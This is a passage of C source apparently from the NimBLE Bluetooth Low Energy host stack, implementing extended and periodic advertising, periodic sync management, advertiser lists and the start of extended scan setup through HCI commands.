*/ switch (ble_gap_slave[instance].our_addr_type) { case BLE_OWN_ADDR_RANDOM: case BLE_OWN_ADDR_RPA_RANDOM_DEFAULT: if (ble_gap_slave[instance].rnd_addr_set) { break; } /* fall through */ case BLE_OWN_ADDR_PUBLIC: case BLE_OWN_ADDR_RPA_PUBLIC_DEFAULT: default: rc = ble_hs_id_use_addr(ble_gap_slave[instance].our_addr_type); if (rc) { ble_hs_unlock(); return BLE_HS_EINVAL; } break; } /* fallback to ID static random address if using random address and instance * wasn't configured with own address */ if (!ble_gap_slave[instance].rnd_addr_set) { switch (ble_gap_slave[instance].our_addr_type) { case BLE_OWN_ADDR_RANDOM: case BLE_OWN_ADDR_RPA_RANDOM_DEFAULT: rc = ble_hs_id_addr(BLE_ADDR_RANDOM, &rnd_addr, NULL); if (rc != 0) { ble_hs_unlock(); return rc; } rc = ble_gap_ext_adv_set_addr_no_lock(instance, rnd_addr); if (rc != 0) { ble_hs_unlock(); return rc; } break; default: break; } } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_EXT_ADV_ENABLE); cmd = (void *) buf; cmd->enable = 0x01; cmd->num_sets = 1; cmd->sets[0].adv_handle = instance; cmd->sets[0].duration = htole16(duration); cmd->sets[0].max_events = max_events; rc = ble_hs_hci_cmd_tx(opcode, cmd, sizeof(buf), NULL, 0); if (rc != 0) { ble_hs_unlock(); return rc; } ble_gap_slave[instance].op = BLE_GAP_OP_S_ADV; ble_hs_unlock(); return 0; } static int ble_gap_ext_adv_stop_no_lock(uint8_t instance) { struct ble_hci_le_set_ext_adv_enable_cp *cmd; uint8_t buf[sizeof(*cmd) + sizeof(cmd->sets[0])]; uint16_t opcode; bool active; int rc; if (!ble_gap_slave[instance].configured) { return BLE_HS_EINVAL; } active = ble_gap_adv_active_instance(instance); cmd = (void *) buf; cmd->enable = 0x00; cmd->num_sets = 1; cmd->sets[0].adv_handle = instance; cmd->sets[0].duration = 0x0000; cmd->sets[0].max_events = 0x00; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_EXT_ADV_ENABLE); rc = ble_hs_hci_cmd_tx(opcode, cmd, sizeof(buf), NULL, 0); if (rc != 0) { return rc; } ble_gap_slave[instance].op = BLE_GAP_OP_NULL; if (!active) { return BLE_HS_EALREADY; } else { return 0; } } int ble_gap_ext_adv_stop(uint8_t instance) { int rc; if (instance >= BLE_ADV_INSTANCES) { return BLE_HS_EINVAL; } ble_hs_lock(); rc = ble_gap_ext_adv_stop_no_lock(instance); ble_hs_unlock(); return rc; } static int ble_gap_ext_adv_set_data_validate(uint8_t instance, struct os_mbuf *data) { uint16_t len = OS_MBUF_PKTLEN(data); if (!ble_gap_slave[instance].configured) { return BLE_HS_EINVAL; } /* not allowed with directed advertising for legacy*/ if (ble_gap_slave[instance].legacy_pdu && ble_gap_slave[instance].directed) { return BLE_HS_EINVAL; } /* always allowed with legacy PDU but limited to legacy length */ if (ble_gap_slave[instance].legacy_pdu) { if (len > BLE_HS_ADV_MAX_SZ) { return BLE_HS_EINVAL; } return 0; } /* if already advertising, data must fit in single HCI command * as per BT 5.0 Vol 2, Part E, 7.8.54. Don't bother Controller with such * a request. */ if (ble_gap_slave[instance].op == BLE_GAP_OP_S_ADV) { if (len > min(MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE), 251)) { return BLE_HS_EINVAL; } } /* not allowed with scannable advertising */ if (ble_gap_slave[instance].scannable) { return BLE_HS_EINVAL; } return 0; } static int ble_gap_ext_adv_set(uint8_t instance, uint16_t opcode, struct os_mbuf **data) { /* in that case we always fit all data in single HCI command */ #if MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE) <= BLE_HCI_MAX_EXT_ADV_DATA_LEN static uint8_t buf[sizeof(struct ble_hci_le_set_ext_adv_data_cp) + \ MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE)]; struct ble_hci_le_set_ext_adv_data_cp *cmd = (void *)buf; uint16_t len = OS_MBUF_PKTLEN(*data); opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, opcode); cmd->adv_handle = instance; cmd->operation = BLE_HCI_LE_SET_DATA_OPER_COMPLETE; cmd->fragment_pref = 0; cmd->adv_data_len = len; os_mbuf_copydata(*data, 0, len, cmd->adv_data); os_mbuf_adj(*data, len); *data = os_mbuf_trim_front(*data); return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); #else static uint8_t buf[sizeof(struct ble_hci_le_set_ext_adv_data_cp) + \ BLE_HCI_MAX_EXT_ADV_DATA_LEN]; struct ble_hci_le_set_ext_adv_data_cp *cmd = (void *)buf; uint16_t len = OS_MBUF_PKTLEN(*data); uint8_t op; int rc; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, opcode); cmd->adv_handle = instance; /* complete data */ if (len <= BLE_HCI_MAX_EXT_ADV_DATA_LEN) { cmd->operation = BLE_HCI_LE_SET_DATA_OPER_COMPLETE; cmd->fragment_pref = 0; cmd->adv_data_len = len; os_mbuf_copydata(*data, 0, len, cmd->adv_data); os_mbuf_adj(*data, len); *data = os_mbuf_trim_front(*data); return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); } /* first fragment */ op = BLE_HCI_LE_SET_DATA_OPER_FIRST; do { cmd->operation = op; cmd->fragment_pref = 0; cmd->adv_data_len = BLE_HCI_MAX_EXT_ADV_DATA_LEN; os_mbuf_copydata(*data, 0, BLE_HCI_MAX_EXT_ADV_DATA_LEN, cmd->adv_data); os_mbuf_adj(*data, BLE_HCI_MAX_EXT_ADV_DATA_LEN); *data = os_mbuf_trim_front(*data); rc = ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); if (rc) { return rc; } len -= BLE_HCI_MAX_EXT_ADV_DATA_LEN; op = BLE_HCI_LE_SET_DATA_OPER_INT; } while (len > BLE_HCI_MAX_EXT_ADV_DATA_LEN); /* last fragment */ cmd->operation = BLE_HCI_LE_SET_DATA_OPER_LAST; cmd->fragment_pref = 0; cmd->adv_data_len = len; os_mbuf_copydata(*data, 0, len, cmd->adv_data); os_mbuf_adj(*data, len); *data = os_mbuf_trim_front(*data); return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); #endif } int ble_gap_ext_adv_set_data(uint8_t instance, struct os_mbuf *data) { int rc; if (instance >= BLE_ADV_INSTANCES) { rc = BLE_HS_EINVAL; goto done; } ble_hs_lock(); rc = ble_gap_ext_adv_set_data_validate(instance, data); if (rc != 0) { ble_hs_unlock(); goto done; } rc = ble_gap_ext_adv_set(instance, BLE_HCI_OCF_LE_SET_EXT_ADV_DATA, &data); ble_hs_unlock(); done: os_mbuf_free_chain(data); return rc; } static int ble_gap_ext_adv_rsp_set_validate(uint8_t instance, struct os_mbuf *data) { uint16_t len = OS_MBUF_PKTLEN(data); if (!ble_gap_slave[instance].configured) { return BLE_HS_EINVAL; } /* not allowed with directed advertising */ if (ble_gap_slave[instance].directed && ble_gap_slave[instance].connectable) { return BLE_HS_EINVAL; } /* only allowed with scannable advertising */ if (!ble_gap_slave[instance].scannable) { return BLE_HS_EINVAL; } /* with legacy PDU limited to legacy length */ if (ble_gap_slave[instance].legacy_pdu) { if (len > BLE_HS_ADV_MAX_SZ) { return BLE_HS_EINVAL; } return 0; } /* if already advertising, data must fit in single HCI command * as per BT 5.0 Vol 2, Part E, 7.8.55. Don't bother Controller with such * a request. */ if (ble_gap_slave[instance].op == BLE_GAP_OP_S_ADV) { if (len > min(MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE), 251)) { return BLE_HS_EINVAL; } } return 0; } int ble_gap_ext_adv_rsp_set_data(uint8_t instance, struct os_mbuf *data) { int rc; if (instance >= BLE_ADV_INSTANCES) { rc = BLE_HS_EINVAL; goto done; } ble_hs_lock(); rc = ble_gap_ext_adv_rsp_set_validate(instance, data); if (rc != 0) { ble_hs_unlock(); goto done; } rc = ble_gap_ext_adv_set(instance, BLE_HCI_OCF_LE_SET_EXT_SCAN_RSP_DATA, &data); ble_hs_unlock(); done: os_mbuf_free_chain(data); return rc; } int ble_gap_ext_adv_remove(uint8_t instance) { struct ble_hci_le_remove_adv_set_cp cmd; uint16_t opcode; int rc; if (instance >= BLE_ADV_INSTANCES) { return BLE_HS_EINVAL; } ble_hs_lock(); if (!ble_gap_slave[instance].configured) { ble_hs_unlock(); return BLE_HS_EALREADY; } if (ble_gap_slave[instance].op == BLE_GAP_OP_S_ADV) { ble_hs_unlock(); return BLE_HS_EBUSY; } cmd.adv_handle = instance; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_REMOVE_ADV_SET); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); if (rc != 0) { ble_hs_unlock(); return rc; } memset(&ble_gap_slave[instance], 0, sizeof(struct ble_gap_slave_state)); ble_hs_unlock(); return 0; } int ble_gap_ext_adv_clear(void) { int rc; uint8_t instance; uint16_t opcode; ble_hs_lock(); for (instance = 0; instance < BLE_ADV_INSTANCES; instance++) { /* If there is an active instance or periodic adv instance, * Don't send the command * */ if ((ble_gap_slave[instance].op == BLE_GAP_OP_S_ADV)) { ble_hs_unlock(); return BLE_HS_EBUSY; } #if MYNEWT_VAL(BLE_PERIODIC_ADV) if (ble_gap_slave[instance].periodic_op == BLE_GAP_OP_S_PERIODIC_ADV) { ble_hs_unlock(); return BLE_HS_EBUSY; } #endif } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CLEAR_ADV_SETS); rc = ble_hs_hci_cmd_tx(opcode, NULL, 0, NULL, 0); if (rc != 0) { ble_hs_unlock(); return rc; } memset(ble_gap_slave, 0, sizeof(ble_gap_slave)); ble_hs_unlock(); return 0; } #if MYNEWT_VAL(BLE_PERIODIC_ADV) static int ble_gap_periodic_adv_params_tx(uint8_t instance, const struct ble_gap_periodic_adv_params *params) { struct ble_hci_le_set_periodic_adv_params_cp cmd; uint16_t opcode; cmd.adv_handle = instance; /* Fill optional fields if application did not specify them. */ if (params->itvl_min == 0 && params->itvl_max == 0) { /* TODO defines for those */ cmd.min_itvl = htole16(30 / 1.25); //30 ms cmd.max_itvl = htole16(60 / 1.25); //150 ms } else { cmd.min_itvl = htole16( params->itvl_min); cmd.max_itvl = htole16(params->itvl_max); } if (params->include_tx_power) { cmd.props = BLE_HCI_LE_SET_PERIODIC_ADV_PROP_INC_TX_PWR; } else { cmd.props = 0; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PERIODIC_ADV_PARAMS); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_periodic_adv_params_validate( const struct ble_gap_periodic_adv_params *params) { if (!params) { return BLE_HS_EINVAL; } if (params->itvl_min && params->itvl_min < 6) { return BLE_HS_EINVAL; } if (params->itvl_max && params->itvl_max < 6) { return BLE_HS_EINVAL; } return 0; } int ble_gap_periodic_adv_configure(uint8_t instance, const struct ble_gap_periodic_adv_params *params) { int rc; if (instance >= BLE_ADV_INSTANCES) { return BLE_HS_EINVAL; } rc = ble_gap_periodic_adv_params_validate(params); if (rc) { return rc; } ble_hs_lock(); /* The corresponding extended advertising instance should be configured */ if (!ble_gap_slave[instance].configured) { ble_hs_unlock(); return ENOMEM; } /* Periodic advertising shall not be configured while it is already * running. * Bluetooth Core Specification, Section 7.8.61 */ if (ble_gap_slave[instance].periodic_op == BLE_GAP_OP_S_PERIODIC_ADV) { ble_hs_unlock(); return BLE_HS_EINVAL; } rc = ble_gap_periodic_adv_params_tx(instance, params); if (rc) { ble_hs_unlock(); return rc; } ble_gap_slave[instance].periodic_configured = 1; ble_hs_unlock(); return 0; } int ble_gap_periodic_adv_start(uint8_t instance) { struct ble_hci_le_set_periodic_adv_enable_cp cmd; uint16_t opcode; int rc; if (instance >= BLE_ADV_INSTANCES) { return BLE_HS_EINVAL; } ble_hs_lock(); /* Periodic advertising cannot start unless it is configured before */ if (!ble_gap_slave[instance].periodic_configured) { ble_hs_unlock(); return BLE_HS_EINVAL; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PERIODIC_ADV_ENABLE); cmd.enable = 0x01; cmd.adv_handle = instance; rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); if (rc != 0) { ble_hs_unlock(); return rc; } ble_gap_slave[instance].periodic_op = BLE_GAP_OP_S_PERIODIC_ADV; ble_hs_unlock(); return 0; } static int ble_gap_periodic_adv_set(uint8_t instance, struct os_mbuf **data) { /* In that case we always fit all data in single HCI command */ #if MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE) <= BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN static uint8_t buf[sizeof(struct ble_hci_le_set_periodic_adv_data_cp) + MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE)]; struct ble_hci_le_set_periodic_adv_data_cp *cmd = (void *) buf; uint16_t len = OS_MBUF_PKTLEN(*data); uint16_t opcode; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PERIODIC_ADV_DATA); cmd->adv_handle = instance; cmd->operation = BLE_HCI_LE_SET_DATA_OPER_COMPLETE; cmd->adv_data_len = len; os_mbuf_copydata(*data, 0, len, cmd->adv_data); os_mbuf_adj(*data, len); *data = os_mbuf_trim_front(*data); return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); #else static uint8_t buf[sizeof(struct ble_hci_le_set_periodic_adv_data_cp) + BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN]; struct ble_hci_le_set_periodic_adv_data_cp *cmd = (void *) buf; uint16_t len = OS_MBUF_PKTLEN(*data); uint16_t opcode; uint8_t op; int rc; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PERIODIC_ADV_DATA); cmd->adv_handle = instance; /* Complete data */ if (len <= BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN) { cmd->operation = BLE_HCI_LE_SET_DATA_OPER_COMPLETE; cmd->adv_data_len = len; os_mbuf_copydata(*data, 0, len, cmd->adv_data); os_mbuf_adj(*data, len); *data = os_mbuf_trim_front(*data); return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); } /* If the periodic advertising is already enabled, the periodic advertising * the op code shall be nothing but 0x03 * Bluetooth Core Specification, section 7.8.62 */ if (ble_gap_slave[instance].periodic_op == BLE_GAP_OP_S_PERIODIC_ADV) { return BLE_HS_EINVAL; } /* First fragment */ op = BLE_HCI_LE_SET_DATA_OPER_FIRST; do{ cmd->operation = op; cmd->adv_data_len = BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN; os_mbuf_copydata(*data, 0, BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN, cmd->adv_data); os_mbuf_adj(*data, BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN); *data = os_mbuf_trim_front(*data); rc = ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); if (rc) { return rc; } len -= BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN; op = BLE_HCI_LE_SET_DATA_OPER_INT; } while (len > BLE_HCI_MAX_PERIODIC_ADV_DATA_LEN); /* Last fragment */ cmd->operation = BLE_HCI_LE_SET_DATA_OPER_LAST; cmd->adv_data_len = len; os_mbuf_copydata(*data, 0, len, cmd->adv_data); os_mbuf_adj(*data, len); *data = os_mbuf_trim_front(*data); return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); #endif } static int ble_gap_periodic_adv_set_data_validate(uint8_t instance, struct os_mbuf *data) { /* The corresponding extended advertising instance should be configured */ if (!ble_gap_slave[instance].configured) { return BLE_HS_EINVAL; } if (ble_gap_slave[instance].legacy_pdu) { return BLE_HS_EINVAL; } /* One more check states that if the periodic advertising is already * enabled, the operation shall be 0x03 (Complete). * This check is handled during sending the data to the controller, as the * length checks are already checked there, so this saves duplicate code */ return 0; } int ble_gap_periodic_adv_set_data(uint8_t instance, struct os_mbuf *data) { int rc; if (instance >= BLE_ADV_INSTANCES) { rc = BLE_HS_EINVAL; goto done; } ble_hs_lock(); rc = ble_gap_periodic_adv_set_data_validate(instance, data); if (rc != 0) { ble_hs_unlock(); goto done; } rc = ble_gap_periodic_adv_set(instance, &data); ble_hs_unlock(); done: os_mbuf_free_chain(data); return rc; } static int ble_gap_periodic_adv_stop_no_lock(uint8_t instance) { struct ble_hci_le_set_periodic_adv_enable_cp cmd; uint16_t opcode; int rc; cmd.enable = 0x00; cmd.adv_handle = instance; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PERIODIC_ADV_ENABLE); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); if (rc != 0) { return rc; } ble_gap_slave[instance].periodic_op = BLE_GAP_OP_NULL; return 0; } int ble_gap_periodic_adv_stop(uint8_t instance) { int rc; if (instance >= BLE_ADV_INSTANCES) { return BLE_HS_EINVAL; } ble_hs_lock(); rc = ble_gap_periodic_adv_stop_no_lock(instance); ble_hs_unlock(); return rc; } static void ble_gap_npl_sync_lost(struct ble_npl_event *ev) { struct ble_hs_periodic_sync *psync; struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; /* this psync is no longer on list so no lock needed */ psync = ble_npl_event_get_arg(ev); cb = psync->cb; cb_arg = psync->cb_arg; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PERIODIC_SYNC_LOST; event.periodic_sync_lost.sync_handle = psync->sync_handle; event.periodic_sync_lost.reason = BLE_HS_EDONE; /* Free the memory occupied by psync as it is no longer needed */ ble_hs_periodic_sync_free(psync); ble_gap_event_listener_call(&event); if (cb) { cb(&event, cb_arg); } } int ble_gap_periodic_adv_sync_create(const ble_addr_t *addr, uint8_t adv_sid, const struct ble_gap_periodic_sync_params *params, ble_gap_event_fn *cb, void *cb_arg) { struct ble_hci_le_periodic_adv_create_sync_cp cmd; struct ble_hs_periodic_sync *psync; uint16_t opcode; int rc; if (addr && (addr->type > BLE_ADDR_RANDOM)) { return BLE_HS_EINVAL; } if (adv_sid > 0x0f) { return BLE_HS_EINVAL; } if ((params->skip > 0x1f3) || (params->sync_timeout > 0x4000) || (params->sync_timeout < 0x0A)) { return BLE_HS_EINVAL; } ble_hs_lock(); /* No sync can be created if another sync is still pending */ if (ble_gap_sync.op == BLE_GAP_OP_SYNC) { ble_hs_unlock(); return BLE_HS_EBUSY; } /* cannot create another sync if already synchronized */ if (ble_hs_periodic_sync_find(addr, adv_sid)) { ble_hs_unlock(); return BLE_HS_EALREADY; } /* preallocate sync element */ psync = ble_hs_periodic_sync_alloc(); if (!psync) { ble_hs_unlock(); return BLE_HS_ENOMEM; } ble_npl_event_init(&psync->lost_ev, ble_gap_npl_sync_lost, psync); if (addr) { cmd.options = 0x00; cmd.peer_addr_type = addr->type; memcpy(cmd.peer_addr, addr->val, BLE_DEV_ADDR_LEN); } else { cmd.options = 0x01; cmd.peer_addr_type = BLE_ADDR_ANY->type; memcpy(cmd.peer_addr, BLE_ADDR_ANY->val, BLE_DEV_ADDR_LEN); } cmd.sid = adv_sid; cmd.skip = params->skip; cmd.sync_timeout = htole16(params->sync_timeout); cmd.sync_cte_type = 0x00; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_CREATE_SYNC); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); if (!rc) { /* This shall be reset upon receiving sync_established event, * or if the sync is cancelled before receiving that event. */ ble_gap_sync.op = BLE_GAP_OP_SYNC; ble_gap_sync.cb = cb; ble_gap_sync.cb_arg = cb_arg; ble_gap_sync.psync = psync; } else { ble_hs_periodic_sync_free(psync); } ble_hs_unlock(); return rc; } int ble_gap_periodic_adv_sync_create_cancel(void) { uint16_t opcode; int rc = 0; ble_hs_lock(); if (ble_gap_sync.op != BLE_GAP_OP_SYNC) { ble_hs_unlock(); return BLE_HS_EBUSY; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_CREATE_SYNC_CANCEL); rc = ble_hs_hci_cmd_tx(opcode, NULL, 0, NULL, 0); ble_hs_unlock(); return rc; } int ble_gap_periodic_adv_sync_terminate(uint16_t sync_handle) { struct ble_hci_le_periodic_adv_term_sync_cp cmd; struct ble_hs_periodic_sync *psync; uint16_t opcode; int rc; ble_hs_lock(); if (ble_gap_sync.op == BLE_GAP_OP_SYNC) { ble_hs_unlock(); return BLE_HS_EBUSY; } /* The handle must be in the list. If it doesn't exist, it means * that the sync may have been lost at the same moment in which * the app wants to terminate that sync handle */ psync = ble_hs_periodic_sync_find_by_handle(sync_handle); if (!psync) { /* Sync already terminated.*/ ble_hs_unlock(); return BLE_HS_ENOTCONN; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_TERM_SYNC); cmd.sync_handle = htole16(sync_handle); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); if (rc == 0) { /* Remove the handle from the list */ ble_hs_periodic_sync_remove(psync); /* send sync_lost event, this is to mimic connection behavior and thus * simplify application error handling */ ble_npl_eventq_put(ble_hs_evq_get(), &psync->lost_ev); } ble_hs_unlock(); return rc; } #if MYNEWT_VAL(BLE_PERIODIC_ADV_SYNC_TRANSFER) int ble_gap_periodic_adv_sync_reporting(uint16_t sync_handle, bool enable) { struct ble_hci_le_periodic_adv_receive_enable_cp cmd; struct ble_hs_periodic_sync *psync; uint16_t opcode; int rc; ble_hs_lock(); if (ble_gap_sync.op == BLE_GAP_OP_SYNC) { ble_hs_unlock(); return BLE_HS_EBUSY; } psync = ble_hs_periodic_sync_find_by_handle(sync_handle); if (!psync) { ble_hs_unlock(); return BLE_HS_ENOTCONN; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_RECEIVE_ENABLE); cmd.sync_handle = htole16(sync_handle); cmd.enable = enable ? 0x01 : 0x00; rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); ble_hs_unlock(); return rc; } int ble_gap_periodic_adv_sync_transfer(uint16_t sync_handle, uint16_t conn_handle, uint16_t service_data) { struct ble_hci_le_periodic_adv_sync_transfer_cp cmd; struct ble_hci_le_periodic_adv_sync_transfer_rp rsp; struct ble_hs_periodic_sync *psync; struct ble_hs_conn *conn; uint16_t opcode; int rc; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (!conn) { ble_hs_unlock(); return BLE_HS_ENOTCONN; } psync = ble_hs_periodic_sync_find_by_handle(sync_handle); if (!psync) { ble_hs_unlock(); return BLE_HS_ENOTCONN; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_SYNC_TRANSFER); cmd.conn_handle = htole16(conn_handle); cmd.sync_handle = htole16(sync_handle); cmd.service_data = htole16(service_data); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (!rc) { BLE_HS_DBG_ASSERT(le16toh(rsp.conn_handle) == conn_handle); } ble_hs_unlock(); return rc; } int ble_gap_periodic_adv_sync_set_info(uint8_t instance, uint16_t conn_handle, uint16_t service_data) { struct ble_hci_le_periodic_adv_set_info_transfer_cp cmd; struct ble_hci_le_periodic_adv_set_info_transfer_rp rsp; struct ble_hs_conn *conn; uint16_t opcode; int rc; if (instance >= BLE_ADV_INSTANCES) { return BLE_HS_EINVAL; } ble_hs_lock(); if (ble_gap_slave[instance].periodic_op != BLE_GAP_OP_S_PERIODIC_ADV) { /* periodic adv not enabled */ ble_hs_unlock(); return BLE_HS_EINVAL; } conn = ble_hs_conn_find(conn_handle); if (!conn) { ble_hs_unlock(); return BLE_HS_ENOTCONN; } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_SET_INFO_TRANSFER); cmd.conn_handle = htole16(conn_handle); cmd.adv_handle = instance; cmd.service_data = htole16(service_data); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (!rc) { BLE_HS_DBG_ASSERT(le16toh(rsp.conn_handle) == conn_handle); } ble_hs_unlock(); return rc; } static int periodic_adv_transfer_enable(uint16_t conn_handle, const struct ble_gap_periodic_sync_params *params) { struct ble_hci_le_periodic_adv_sync_transfer_params_cp cmd; struct ble_hci_le_periodic_adv_sync_transfer_params_rp rsp; uint16_t opcode; int rc; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_SYNC_TRANSFER_PARAMS); cmd.conn_handle = htole16(conn_handle); cmd.sync_cte_type = 0x00; cmd.mode = params->reports_disabled ? 0x01 : 0x02; cmd.skip = htole16(params->skip); cmd.sync_timeout = htole16(params->sync_timeout); rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (!rc) { BLE_HS_DBG_ASSERT(le16toh(rsp.conn_handle) == conn_handle); } return rc; } int ble_gap_periodic_adv_sync_receive(uint16_t conn_handle, const struct ble_gap_periodic_sync_params *params, ble_gap_event_fn *cb, void *cb_arg) { struct ble_hs_conn *conn; int rc; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (!conn) { ble_hs_unlock(); return BLE_HS_ENOTCONN; } if (params) { if (conn->psync) { ble_hs_unlock(); return BLE_HS_EALREADY; } conn->psync = ble_hs_periodic_sync_alloc(); if (!conn->psync) { ble_hs_unlock(); return BLE_HS_ENOMEM; } rc = periodic_adv_transfer_enable(conn_handle, params); if (rc) { ble_hs_periodic_sync_free(conn->psync); conn->psync = NULL; } else { conn->psync->cb = cb; conn->psync->cb_arg = cb_arg; ble_npl_event_init(&conn->psync->lost_ev, ble_gap_npl_sync_lost, conn->psync); } } else { if (!conn->psync) { ble_hs_unlock(); return BLE_HS_EALREADY; } rc = periodic_adv_transfer_disable(conn_handle); if (!rc) { ble_hs_periodic_sync_free(conn->psync); conn->psync = NULL; } } ble_hs_unlock(); return rc; } #endif int ble_gap_add_dev_to_periodic_adv_list(const ble_addr_t *peer_addr, uint8_t adv_sid) { struct ble_hci_le_add_dev_to_periodic_adv_list_cp cmd; uint16_t opcode; if ((peer_addr->type > BLE_ADDR_RANDOM) || (adv_sid > 0x0f)) { return BLE_ERR_INV_HCI_CMD_PARMS; } cmd.peer_addr_type = peer_addr->type; memcpy(cmd.peer_addr, peer_addr->val, BLE_DEV_ADDR_LEN); cmd.sid = adv_sid; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_ADD_DEV_TO_PERIODIC_ADV_LIST); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } int ble_gap_rem_dev_from_periodic_adv_list(const ble_addr_t *peer_addr, uint8_t adv_sid) { struct ble_hci_le_rem_dev_from_periodic_adv_list_cp cmd; uint16_t opcode; if ((peer_addr->type > BLE_ADDR_RANDOM) || (adv_sid > 0x0f)) { return BLE_ERR_INV_HCI_CMD_PARMS; } cmd.peer_addr_type = peer_addr->type; memcpy(cmd.peer_addr, peer_addr->val, BLE_DEV_ADDR_LEN); cmd.sid = adv_sid; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_REM_DEV_FROM_PERIODIC_ADV_LIST); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } int ble_gap_clear_periodic_adv_list(void) { uint16_t opcode; int rc = 0; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CLEAR_PERIODIC_ADV_LIST); rc = ble_hs_hci_cmd_tx(opcode, NULL, 0, NULL, 0); return rc; } int ble_gap_read_periodic_adv_list_size(uint8_t *per_adv_list_size) { struct ble_hci_le_rd_periodic_adv_list_size_rp rsp; uint16_t opcode; int rc = 0; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_RD_PERIODIC_ADV_LIST_SIZE); rc = ble_hs_hci_cmd_tx(opcode, NULL, 0, &rsp, sizeof(rsp)); if (rc != 0) { return rc; } *per_adv_list_size = rsp.list_size; return 0; } #endif /***************************************************************************** * $discovery procedures * *****************************************************************************/ #if MYNEWT_VAL(BLE_EXT_ADV) && NIMBLE_BLE_SCAN static int ble_gap_ext_disc_tx_params(uint8_t own_addr_type, uint8_t filter_policy, const struct ble_hs_hci_ext_scan_param *uncoded_params, const struct ble_hs_hci_ext_scan_param *coded_params) { struct ble_hci_le_set_ext_scan_params_cp *cmd; struct scan_params *params; uint8_t buf[sizeof(*cmd) + 2 * sizeof(*params)]; uint8_t len = sizeof(*cmd); /* Check own addr type */ if (own_addr_type > BLE_HCI_ADV_OWN_ADDR_MAX) { return BLE_ERR_INV_HCI_CMD_PARMS; } /* Check scanner filter policy */ if (filter_policy > BLE_HCI_SCAN_FILT_MAX) { return BLE_ERR_INV_HCI_CMD_PARMS; } cmd = (void *) buf; params = cmd->scans; cmd->filter_policy = filter_policy; cmd->own_addr_type = own_addr_type; cmd->phys = 0; if (uncoded_params) { cmd->phys |= BLE_HCI_LE_PHY_1M_PREF_MASK; params->type = 